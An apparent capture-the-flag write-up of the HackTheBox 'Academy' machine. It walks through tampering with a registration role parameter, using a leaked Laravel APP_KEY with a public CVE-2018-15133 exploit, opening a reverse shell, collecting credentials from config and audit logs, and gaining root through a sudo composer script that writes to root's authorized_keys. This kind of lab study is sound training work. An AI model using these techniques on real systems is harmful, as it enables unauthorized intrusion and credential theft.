Academy Academy

Academy from HackTheBox was relatively an easy and straightforward machine, it starts with two open ports SSH on 22 and HTTP on 80 we find an app we abuse the registration system to gain admin access to it then we discover subdomain which is a development server full of information, from there we get a shell on the box, after that we find many users and some credentials around, we try to escalate till we get access to user mrb3n who can use sudo on composer that will give us root access. so let’s start!

Summary

Recon

Nmap

Nmap full TCP scann shows us 2 open ports.

nmap full tcp scan nmap full tcp scan
Nmap targeted scan with default scripts and version enummiration against port 22,80, from apache version we can guess this is ubuntu Fossa.
nmap targeted scan nmap targeted scan
Adding academy.htb (revealed in the nmap scan) to /etc/hosts
adding academy.htb to /etc/hosts adding academy.htb to /etc/hosts

Looking at the source page revealed nothing so let’s check the links on the page.

main page in port 80 main page in port 80

Gobuster

Fuzzing directories got few hits admin.php config.php

fuzzing academy.htb with gobuster fuzzing academy.htb with gobuster
Alright let’s take a look at the application from a user point of view by creating an account
registration page registration page
Hmm, something looks weird i registered with username rekkodo and it looged me with username egre55, time for burpsuite.
logged in as egre55 logged in as egre55

Burpsuite

Looking at registration post request in burpsuite we notice roleid=0 which i can assume it decides if user will be regular or admin account so let’s change that to 1 and see what happens.

burpsuite registration post request burpsuite registration post request
We try to login with the created account rek who has roleid=1 but from admin.php page.
admin logging page admin logging page
We did logging to the backend and we see Academy Launch Planer, we do notice the mention of fixing issue in the subdomain dev-staging-01.academy.htb.
Logged in to admin area Logged in to admin area
Let’s add dev-staging-01.academy.htb to /etc/hosts.
adding dev-staging-01.academy.htb to /etc/hosts adding dev-staging-01.academy.htb to /etc/hosts
By navigating to the new discovered subdomain we see tons of information like technology used is laravel, APP_KEY, DB system is MYSQL as we did find username and password of databse called homestead
navigating to dev-staging-01.academy.htb navigating to dev-staging-01.academy.htb
We took the information found and put them in CherryTree trying to stay organized.
CherryTree CherryTree
After a little searching in google I found CVE we can use to gain intial foothold on the box.
github repo of CVE-2018-15133 github repo of CVE-2018-15133
Cloning the repo to our local machine.
cloning the repo to local machine cloning the repo to local machine
After reading the python script we try it with APP_KEY found earlier to get RCE with command id we get a hit, RCE works!
getting RCE on the box getting RCE on the box

User shell

We set up nc listener on port 9000 and execute the python script with reverse shell to us and we get hit back.

initial shell initial shell
As soon as we get a shell we see an interesting file .env and as we suspected it contains credentials.
cat .env file cat .env file
By checking /home or /etc/passwd we can tell there are several users so we try ssh login with the found credentials against those users.
ssh login as cry0l1t3 ssh login as cry0l1t3
Looking around in the system we see juicy files in /var/log/audit, in audit.log we get more ceredentials, we use them to login as mrb3n.
changing user to mrb3n changing user to mrb3n

Root shell

We are logged in as mrb3n and we discovered after typing this command sudo -l that this user can use sudo on composer.

sudo -l as mrb3n sudo -l as mrb3n

mrb3n@academy:~$ TF=$(mktemp -d)
mrb3n@academy:~$ nano $TF/composer.json
{"scripts":{"rekkodo":"echo ' public key ' >> /root/.ssh/authorized_keys"}}
mrb3n@academy:~$ sudo /usr/bin/composer --working-dir=$TF run-script rekkodo

From our attacking machine we use our private key to login as root.

yami@sama:~$ ssh -i .ssh/id-rsa root@academy.htb
logging to academy box as root logging to academy box as root